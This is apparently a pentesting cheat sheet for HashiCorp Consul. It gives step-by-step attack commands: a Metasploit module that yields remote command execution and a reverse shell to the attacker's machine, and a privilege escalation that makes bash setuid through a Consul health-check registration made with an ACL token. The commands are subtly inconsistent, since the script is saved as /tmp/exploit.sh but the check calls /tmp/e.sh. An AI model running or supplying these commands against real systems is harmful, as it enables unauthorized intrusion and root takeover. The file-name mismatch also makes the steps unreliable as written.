HashiCorp Consul Pentesting
Last modified: 2025-03-15
An open-source service networking platform developed by HashiCorp. A default port is 8500.
Interesting Files in Target System
If we are in the target system, we can investigate the following files:
cat /etc/consul.d/config.json
RCE
Resource: Pentester Academy Blog
Using Metasploit, we may be able to execute command and get a reverse shell. Run the following commands in your local machine.
msfconsole
msf> use exploit/multi/misc/consul_service_exec
msf> set rhosts <target-ip>
msf> set lhost <your-ip>
msf> run
# Session created...
msf> shell # Spawn the shell
whoami # Run command in the target system
Privilege Escalation
If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to privilege escalation.
First, create a script which changes the permission of ‘bash’.
echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh
Then curl.
curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
KV (Key/Value) Store
# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data